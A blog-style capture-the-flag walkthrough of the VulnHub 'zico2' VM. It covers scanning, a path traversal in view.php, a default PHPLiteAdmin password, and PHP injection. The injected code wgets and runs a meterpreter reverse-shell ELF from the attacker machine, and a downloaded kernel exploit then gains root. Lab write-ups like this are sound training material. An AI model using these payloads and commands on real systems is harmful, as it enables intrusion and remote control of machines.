CTF Walkthrough: zico2

Okay, let’s give an “intermediate” CTF a shot here. Not sure what makes it harder yet, but I’m excited to get going, so let’s do this!

This Boot2Root VM is “zico2”, available from VulnHub.

The goal of this CTF is to get root and read the flag file. This VM works without issue in VirtualBox 5. Have fun!

First, as usual, nmap.

root@kali:~# nmap -sV -T4 10.13.37.206 -p-

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-08 22:33 EST
Warning: 10.13.37.206 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.13.37.206
Host is up (0.00018s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  tcpwrapped
80/tcp    open  http       Apache httpd 2.2.22 ((Ubuntu))
111/tcp   open  rpcbind    2-4 (RPC #100000)
53380/tcp open  status     1 (RPC #100024)
MAC Address: 08:00:27:98:69:CA (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1664.24 seconds

We’ll start with port 80. (I started a brute force ssh run in the background in the meantime, because you never know, but it came up with nothing.)

So let’s see what subdirectories gobuster comes up with.

root@kali:~# gobuster -u http://10.13.37.206 -w /usr/share/wordlists/dirb/big.txt 

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.13.37.206/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/big.txt
[+] Status codes : 200,204,301,302,307
=====================================================
/LICENSE (Status: 200)
/css (Status: 301)
/dbadmin (Status: 301)
/img (Status: 301)
/index (Status: 200)
/js (Status: 301)
/package (Status: 200)
/tools (Status: 200)
/vendor (Status: 301)
/view (Status: 200)
=====================================================

First, the root, (http://10.13.37.206). Just the start of a site, nothing interesting… except…

So, if it’s not obvious to you, it looks like maybe we’ll be able to use view.php to view files on the server.

root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh 
sys:x:3:3:sys:/dev:/bin/sh 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/bin/sh 
man:x:6:12:man:/var/cache/man:/bin/sh 
lp:x:7:7:lp:/var/spool/lpd:/bin/sh 
mail:x:8:8:mail:/var/mail:/bin/sh 
news:x:9:9:news:/var/spool/news:/bin/sh 
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh 
proxy:x:13:13:proxy:/bin:/bin/sh 
www-data:x:33:33:www-data:/var/www:/bin/sh 
backup:x:34:34:backup:/var/backups:/bin/sh 
list:x:38:38:Mailing List Manager:/var/list:/bin/sh 
irc:x:39:39:ircd:/var/run/ircd:/bin/sh 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh 
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh 
libuuid:x:100:101::/var/lib/libuuid:/bin/sh 
syslog:x:101:103::/home/syslog:/bin/false 
messagebus:x:102:105::/var/run/dbus:/bin/false 
ntp:x:103:108::/home/ntp:/bin/false 
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin 
vboxadd:x:999:1::/var/run/vboxadd:/bin/false 
statd:x:105:65534::/var/lib/nfs:/bin/false 
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false 
zico:x:1000:1000:,,,:/home/zico:/bin/bash 

Cool, that might end up being helpful. Plus now we have some system accounts.

Checking out the other subdirectories, nothing else looks too interesting until I hit http://10.13.37.206/dbadmin/. Inside there’s a test_db.php file, which give us a login page for PHPLiteAdmin v1.9.3.

A quick Google search show that the default password is “admin”, which isn’t changed as part of the initialization process. I’m guessing that since there are a few unfinished web frameworks here that the sys admin might not have completed setting everything up, so let’s try that. Although, who am I kidding, default passwords are always good to guess anyway.

It worked!

Looking through everything that’s here, there are a couple users (and their hashed passwords) in the test_users database, “info” table.

You can crack the passwords, they are “34kroot34” (for root), and “zico2215@” for zico. (Spoiler: I ended up not needing these, but maybe you’ll find them useful in finding another way in.)

Okay, let’s see if this has any known vulnerabilities.

It looks like it does! Long story short, if you create a database, you can specify the extension you want to use for it, and it will save that database in “/usr/databases”. So if you create a database with the “.php” extension, then you can create a table in that database with one text column, with a default value that is some valid php code, and when you view that “page” in a browser window, it will execute the PHP code. I’m not going to go into a ton of detail here, that’s what Google is for. 🙂

So I figured what I would do is the following:

  1. Create reverse shell executable to point back to my kali
  2. Share the executable via a python http server
  3. Start up a meterpreter listener
  4. Create some PHP code to download the executable, make it executable, and execute it to open the reverse shell
  5. Profit?

Step 1, create the reverse shell executable.

root@kali:~# msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=10.13.37.237 LPORT=443 -f elf -o /tmp/rshell
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: /tmp/rshell

Run the http server to host the file for download.

root@kali:/tmp# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 ...

Start meterpreter reverse TCP handler.

root@kali:/tmp# systemctl start postgresql
root@kali:/tmp# msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
PAYLOAD => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.13.37.237
LHOST => 10.13.37.237
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.13.37.237:443 

Create the aforementioned database/table in PHPLiteAdmin with the following default value:

'<?php system("cd /tmp; wget http://10.13.37.237:8000/rshell; chmod 777 rshell; ./rshell"); ?>'

And then navigate to the following URL to run the PHP:

http://10.13.37.206/view.php?page=../../../../usr/databases/rshell.php

Meterpreter should now look something like this. You’ll have to hit enter, and then start the interaction with the session that was opened.

msf exploit(handler) > [*] Sending stage (847604 bytes) to 10.13.37.206
[*] Meterpreter session 1 opened (10.13.37.237:443 -> 10.13.37.206:54907) at 2017-11-09 06:03:40 -0500
<hit enter>
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

Start up a shell, and then use Python to get bash running. Because I like bash better. Then we figure out what version of the kernel we’re running, maybe we can find a privilege escalation exploit.

meterpreter > shell
Process 4407 created.
Channel 7 created.
python -c 'import pty; pty.spawn("/bin/bash");'
www-data@zico:/home/zico/wordpress$ cd /tmp
cd /tmp
www-data@zico:/tmp$ uname -a
uname -a
Linux zico 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux

Search exploit-db.com for the kernel version, and sure enough, there’s an exploit: “vnik” Download it, compile it, and run it, as per the instructions in the source.

www-data@zico:/tmp$ wget https://www.exploit-db.com/raw/33589/ -O vnik.c
wget https://www.exploit-db.com/raw/33589/ -O vnik.c
--2017-11-10 03:09:10--  https://www.exploit-db.com/raw/33589/
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3664 (3.6K) 
Saving to: `vnik.c'

100%[======================================>] 3,664       --.-K/s   in 0s      

2017-11-10 03:09:10 (313 MB/s) - `vnik.c' saved [3664/3664]

www-data@zico:/tmp$ gcc vnik.c -O2 -o vnik
gcc vnik.c -O2 -o vnik
www-data@zico:/tmp$ chmod 777 vnik
chmod 777 vnik
www-data@zico:/tmp$ ./vnik 0
./vnik 0
IDT addr = 0xffffffff81dd7000
Using int = 3 with offset = -49063
root@zico:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)
root@zico:/tmp# ls /root
ls /root
flag.txt
root@zico:/tmp# cat /root/flag.txt
cat /root/flag.txt
#
#
#
# ROOOOT!
# You did it! Congratz!
# 
# Hope you enjoyed! 
# 
# 
#
#

And done! That wasn’t too hard! I did enjoy it though.

Until next time!